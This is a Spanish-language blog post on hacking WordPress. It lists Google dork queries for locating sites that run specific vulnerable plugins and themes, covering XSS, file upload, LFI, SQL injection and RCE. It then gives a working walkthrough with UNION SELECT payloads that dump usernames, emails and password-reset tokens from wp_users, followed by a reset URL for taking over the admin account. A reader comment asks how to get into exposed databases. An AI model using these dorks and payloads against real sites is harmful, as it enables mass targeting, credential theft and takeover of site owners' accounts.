Como hackear WordPress usando Dorks en Google

Hola a tod@s

Wordpress es sin duda el CMS más popular y usado por los usuarios de la blogosfera, por ello también es el más atacado debido a los miles de plugins y temas disponibles para WordPress.

Lo primero que se realiza es la parte de enumeración y como encontrar sitios que utilicen Wordpress y los plugins que utilizan.



Encontrar sitios con Wordpress:
  • intext:"Proudly powered by WordPress. "
  • intext:"Powered by WordPress. " 

Ver plugins instalados:
  • inurl: /wordpress/wp-content/plugins/

Es hora de buscar algunas vulnerabilidades conocidas:
Listado de directorio
  • "index of" inurl:wp-content/
  • "inurl:"/wp-content/plugins/wp-shopping-cart/"

Una de base de datos
  • "inurl:wp-content/plugins/wp-dbmanager/"

Wordpress theme Doraa XSS Vulnerability
  • Themes by Bons.us

Wordpress theme Dosimple XSS Vulnerability
  • "Theme by domainagan.com."

WordPress WP Symposium Plugin Cross Site Scripting
  • "/wp-content/plugins/wp-symposium/"

WordPress mTheme-Unus Local File Inclusion
  • ilnurl:/wp-content/themes/mTheme-Unus/

Wordpress Better-wp-security Plugin Remote Code Execution
  • inurl:wp-content/plugins/better-wp-security

WordPress U-Design Theme 2.7.9 Cross Site Scripting
  • inurl:/wp-theme/u-design/

 Wordpress Plugin easy-comment-uploads File Upload Vulendrability
  • inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php


WordPress Category and Page Icons File Upload
  • index of "/wp-content/plugins/category-page-icons/"

 WordPress theme parallelus-salutation Arbitrary File Download Vulnerability
  • inurl:themes/parallelus-salutation/ OR inurl:themes/parallelus-salutation/framework/

WordPress Auto-ThickBox-Plus XSS Vulnerability
inurl:"/wp-content/plugins/auto-thickbox-plus/"

Wordpress "Js Support Ticket" File Upload Bypass Extensions
inurl:/js-support-ticket-controlpanel/

WordPress Appointment Booking Calendar 1.1.24 Escalation / XSS
Index of /wordpress/wp-content/plugins/appointment-booking-calendar/

WordPress Appointment Booking Calendar 1.1.24 SQL Injection
  • Index of /wordpress/wp-content/plugins/appointment-booking-calendar/

Wordpress clikstats plugin Open Redirect
  • Dork: inurl:"/wp-content/plugins/clikstats/ck.php?"

Arbitrary File Upload: Easy Comment Uploads - Version - 3.2.1, usamos la siguiente dork:
  • inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php

Stored XSS: Versión 3.2.3, usamos la siguiente dork:
  • inurl:/wp-content/plugins/count-per-day/notes.php

Arbitrary File Upload: Custom Content Type Manager, usamos la siguiente dork:
  • inurl:/wp-content/plugins/custom-content-type-manager/upload_form.php

SQL Injection: Wordpress HD Webplayer - Versión 1.1, usamos la siguiente dork:
  • inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid=

[Full-disclosure] WordPress <= 2.8.3 Remote admin reset password. Con este obtendremos el user_login y user_email de la siguiente manera:
  • /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_email,0x3b),2,3,4,5,6,7,8,9,10,11 from wp_users

Una vez obtenido el usuario o e-mail nos dirigimos a www.sitio-web.com/wp-admin y seleccionamos en ¿Olvidó su contraseña? introducimos el usuario o e-mail.
Presionar en "Get New Password" la cual el sitio web enviara un token, dicho token se almacena en la DB, por lo tanto se obtendrá dicho código de la siguiente manera:
  • /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3b),2,3,4,5,6,7,8,9,1​0,11 from wp_users

Obtenido el token, sólo faltaría restablecer la contraseña, para ello nos dirigimos al siguiente link:
http://www.sitio-web.com/wp-login.php?action=rp&key=Token&login=Usuario
Remplazamos el token  y usuario por lo datos que nos arroja la DB, por ejemplo:
http://www.sitio-web.com/wp-login.php?action=rp&key=JAr7W8letkza&login=admin
Por lo que lograremos la opción de restablecer la password fácil, fácil y con fundamento.

Full Path Disclosure (FPD), usaremos la siguiente dork:
  • inurl:"/wp-includes/

Wordpress Formcraft Plugin File Upload Vulnerability
  • intext:"powered by formcraft", inurl:plugins/formcraft

Wordpress Smallbiz Themes Remote File Uploads Vulnerability

  • inurl:wp-content/themes/smallbiz/palette/index.php

No seáis malos.

Share this

Related Posts

Previous
Next Post »

1 comentarios:

comentarios
Anónimo
12 de marzo de 2017, 20:48 delete

Hola!

Gracias por el post, estoy iniciandome un poco en el mundillo de las dork url, pero ahi algo que no logro hacer, me interesa acceder a algunas bases de datos, ya que veo sus contraseñas y usernames,..pero como accedo a esa base de datos?, intento desde phpmyadmin remoto pero no logro hacerlo, por cierto no es para hackear pero me interesa para saberlo para aplicar a mis propias paginas web, saludos!

Reply
avatar